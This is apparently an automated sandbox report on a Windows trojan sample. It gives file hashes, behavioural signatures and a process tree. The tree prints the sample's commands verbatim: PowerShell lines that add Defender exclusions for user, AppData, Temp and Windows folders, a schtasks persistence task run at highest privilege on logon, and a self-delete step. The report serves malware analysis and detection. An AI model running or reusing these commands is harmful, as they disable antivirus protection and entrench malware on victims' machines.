Analysis
-
max time kernel
150s -
max time network
15s -
platform
windows7_x64 -
resource
win7-en-20210916 -
submitted
17-09-2021 11:54
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe
Resource
win7-en-20210916
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe
Resource
win10v20210408
General
-
Target
SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe
-
Size
188KB
-
MD5
e74b2720eaf32bfc409eb52a3d5e937f
-
SHA1
c931871ebdb109ee7b8ad58e33245530cb346293
-
SHA256
b26af435a04aa06ce23d5858501a076e73708911506380d4c6b6bfc79fcdf27a
-
SHA512
b99118dd30125b6f512fd6e4b89a1bdb999c0701edc1698296cf2233d0f911fe70f04e3bceefd2fda99ba6e8a4e9c22cf37ecc909a6dba7bf6ad081daa12f150
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
svchost64.exepid Process 1248 svchost64.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid Process 1576 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepid Process 1596 powershell.exe 1028 powershell.exe 2024 powershell.exe 1072 powershell.exe 1248 svchost64.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exesvchost64.exedescription pid Process Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1248 svchost64.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.execmd.execmd.exesvchost64.execmd.execmd.exedescription pid Process procid_target PID 952 wrote to memory of 780 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 28 PID 952 wrote to memory of 780 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 28 PID 952 wrote to memory of 780 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 28 PID 780 wrote to memory of 1596 780 cmd.exe 30 PID 780 wrote to memory of 1596 780 cmd.exe 30 PID 780 wrote to memory of 1596 780 cmd.exe 30 PID 780 wrote to memory of 1028 780 cmd.exe 31 PID 780 wrote to memory of 1028 780 cmd.exe 31 PID 780 wrote to memory of 1028 780 cmd.exe 31 PID 780 wrote to memory of 2024 780 cmd.exe 32 PID 780 wrote to memory of 2024 780 cmd.exe 32 PID 780 wrote to memory of 2024 780 cmd.exe 32 PID 780 wrote to memory of 1072 780 cmd.exe 33 PID 780 wrote to memory of 1072 780 cmd.exe 33 PID 780 wrote to memory of 1072 780 cmd.exe 33 PID 952 wrote to memory of 1576 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 34 PID 952 wrote to memory of 1576 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 34 PID 952 wrote to memory of 1576 952 SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe 34 PID 1576 wrote to memory of 1248 1576 cmd.exe 36 PID 1576 wrote to memory of 1248 1576 cmd.exe 36 PID 1576 wrote to memory of 1248 1576 cmd.exe 36 PID 1248 wrote to memory of 1564 1248 svchost64.exe 37 PID 1248 wrote to memory of 1564 1248 svchost64.exe 37 PID 1248 wrote to memory of 1564 1248 svchost64.exe 37 PID 1564 wrote to memory of 1568 1564 cmd.exe 39 PID 1564 wrote to memory of 1568 1564 cmd.exe 39 PID 1564 wrote to memory of 1568 1564 cmd.exe 39 PID 1248 wrote to memory of 544 1248 svchost64.exe 40 PID 1248 wrote to memory of 544 1248 svchost64.exe 40 PID 1248 wrote to memory of 544 1248 svchost64.exe 40 PID 544 wrote to memory of 1824 544 cmd.exe 42 PID 544 wrote to memory of 1824 544 cmd.exe 42 PID 544 wrote to memory of 1824 544 cmd.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.46968833.5808.6408.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'5⤵
- Creates scheduled task(s)
PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:1824
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
dcb4b25c427f6f177b2548b4607a2bc0
SHA1e9cff09a5b701d029e700b2a1d94827d2b193f68
SHA2565a219a59dddfc7f04727b3ce435a70c7be99452e8ebc43fe51821b23db8c9e05
SHA512f2c774786f99de0745c1c5896d57dcfd438f32aeeb2d6be42e7a713a0f1fac4ae1dc7c4847066738816e8e0dfdcd578bd57cf9305ea168fafc5d5fc2331477e2
-
MD5
dcb4b25c427f6f177b2548b4607a2bc0
SHA1e9cff09a5b701d029e700b2a1d94827d2b193f68
SHA2565a219a59dddfc7f04727b3ce435a70c7be99452e8ebc43fe51821b23db8c9e05
SHA512f2c774786f99de0745c1c5896d57dcfd438f32aeeb2d6be42e7a713a0f1fac4ae1dc7c4847066738816e8e0dfdcd578bd57cf9305ea168fafc5d5fc2331477e2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5ea848ec01ec2f3f61863b5457f1673fe
SHA1e638131a8a4da46bff41a2ba9d4fd9fa528c0931
SHA25674d5b476a0ce58c2112fc342b5333a451ed12e8bbd64a86c11bf1f60cdde0b26
SHA5128122f72b242e1e027298853105b769ac02968e2592d9cccfbc9b3b502a3f398eb37d274aa087e843d9312968d542b00096b34434c97887117201562cd8686405
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5ea848ec01ec2f3f61863b5457f1673fe
SHA1e638131a8a4da46bff41a2ba9d4fd9fa528c0931
SHA25674d5b476a0ce58c2112fc342b5333a451ed12e8bbd64a86c11bf1f60cdde0b26
SHA5128122f72b242e1e027298853105b769ac02968e2592d9cccfbc9b3b502a3f398eb37d274aa087e843d9312968d542b00096b34434c97887117201562cd8686405
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5ea848ec01ec2f3f61863b5457f1673fe
SHA1e638131a8a4da46bff41a2ba9d4fd9fa528c0931
SHA25674d5b476a0ce58c2112fc342b5333a451ed12e8bbd64a86c11bf1f60cdde0b26
SHA5128122f72b242e1e027298853105b769ac02968e2592d9cccfbc9b3b502a3f398eb37d274aa087e843d9312968d542b00096b34434c97887117201562cd8686405
-
MD5
dcb4b25c427f6f177b2548b4607a2bc0
SHA1e9cff09a5b701d029e700b2a1d94827d2b193f68
SHA2565a219a59dddfc7f04727b3ce435a70c7be99452e8ebc43fe51821b23db8c9e05
SHA512f2c774786f99de0745c1c5896d57dcfd438f32aeeb2d6be42e7a713a0f1fac4ae1dc7c4847066738816e8e0dfdcd578bd57cf9305ea168fafc5d5fc2331477e2